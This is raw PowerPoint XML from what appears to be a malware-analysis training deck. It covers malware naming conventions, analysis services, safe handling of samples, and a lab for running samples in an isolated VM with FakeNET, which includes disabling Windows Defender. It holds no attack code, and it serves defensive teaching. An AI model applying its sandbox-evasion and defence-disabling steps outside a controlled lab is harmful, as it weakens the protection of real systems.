              <a:t>http://www.microsoft.com/security/portal/mmpc/shared/malwarenaming.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="438786520"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="221339" y="3391807"/>
          <a:ext cx="8686800" cy="1618343"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{69CF1AB2-1976-4502-BF36-3FF5EA218861}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2895600"/>
                <a:gridCol w="2895600"/>
                <a:gridCol w="2895600"/>
              </a:tblGrid>
              <a:tr h="754743">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0"/>
                        <a:t>Trojan.Reveton.6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0"/>
                        <a:t>Trojan-Ransom.Win32.Reveton (A)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0"/>
                        <a:t>TROJ_REVETON.KB</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="301897">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>Trojan.Win32.Reveton</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>Trojan/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>Reveton.n</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>Win32/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>Reveton.N</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="528320">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>Trojan.Win32.Reveton.q (v)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>Trojan:Win32/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>Reveton.N</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>Win32:Reveton-LS [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>Trj</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                        <a:t>]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108180866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name deciphering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>W32/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Sdbot.worm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>PUP.Optional.BundleInstaller.A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>PE64_EXPIRO.JX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>JS/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Redir</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Backdoor.Win32.IRCBot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>PWS-Banker.dldr!E50F614876CF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197090553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virus total</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 5">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971550"/>
            <a:ext cx="5407025" cy="3704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744116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err="1" smtClean="0"/>
              <a:t>malwr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2">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5" y="942975"/>
            <a:ext cx="8793162"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037444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other services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87689"/>
            <a:ext cx="4521200" cy="3510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895350"/>
            <a:ext cx="751522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625553"/>
            <a:ext cx="2651474" cy="3357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635078"/>
            <a:ext cx="3236119" cy="3357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447162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handling malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Transport in an ‘inactive’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>pws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> archive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Rename sample extension (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>WinOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>) using fool-proof means (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>-line)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Lock down development </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Anti-malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Policies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Be ready to disconnect from the network at the drop of a hat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410569102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malware replication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>What is replication?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Where do you start?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Basic static analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>File type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Dependency clues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Exported functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80308863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 file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5A1DC566-6DD8-4E64-B54C-9F29185D0E2F}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Wednesday, January 7, 15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8" descr="Screen Shot 2015-01-06 at 7.21.41 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-4955" r="-4955"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-400182" y="895350"/>
            <a:ext cx="9832275" cy="4248150"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415008952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 file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5A1DC566-6DD8-4E64-B54C-9F29185D0E2F}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Wednesday, January 7, 15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2015-01-06 at 7.20.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838200"/>
            <a:ext cx="9093200" cy="3409950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177058118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What does it look like?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://blogs.mcafee.com/wp-content/uploads/2012/09/2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23950"/>
            <a:ext cx="4844685" cy="3619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blogs.mcafee.com/wp-content/uploads/2012/04/flashback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895350"/>
            <a:ext cx="4724400" cy="3368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4911360" y="1123950"/>
            <a:ext cx="3927840" cy="3502749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="https://blogs.mcafee.com/wp-content/uploads/2012/04/Darkmegi-FileCop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2266950"/>
            <a:ext cx="4724400" cy="27908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toastytech.com/guis/win7defaul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819148"/>
            <a:ext cx="5457825" cy="40933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blogs.mcafee.com/wp-content/uploads/2012/04/ZeroAccessOneWeekConsumerReportsU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904875"/>
            <a:ext cx="6953250" cy="35528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1.pcmag.com/media/images/220316-mcafee-total-protection-2010-siteadvisor-in-google-result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500" y="772301"/>
            <a:ext cx="5257800" cy="38179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0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1651000" y="673100"/>
            <a:ext cx="5842000" cy="3797300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98668059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malware replication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Other key factors for successful replication?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Isolated environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Hardened VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Bait!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258212020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malware replication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Measuring successful replication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>What events or changes occurred during replication?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Which of these were caused by the sample versus background noise?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>What was the impact of these events/changes?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164707450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Lab – Part 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Setting Up Replication Environment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135105148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latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Virtualization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Versus Malware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="Screen Shot 2015-01-06 at 9.56.3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7567"/>
            <a:ext cx="5151025" cy="4345933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97929908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malware replication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remote desktop to VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VM is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>isolated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Can the VM reach the internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>The host OS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>systems on the network?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Harden VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change what </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>makes sense:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MAC address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Remove VM Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;others&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defender and other tools that might interfere (Win Update)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FakeNET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> operational </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Users\Admin\Desktop\Tools\Fakenet1.0b\FakeNet.exe)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Do DNS queries resolve?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Do arbitrary HTTP requests result in a web page loading?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293527069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Lab – Part 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Execute a Sample</a:t>
            </a:r>
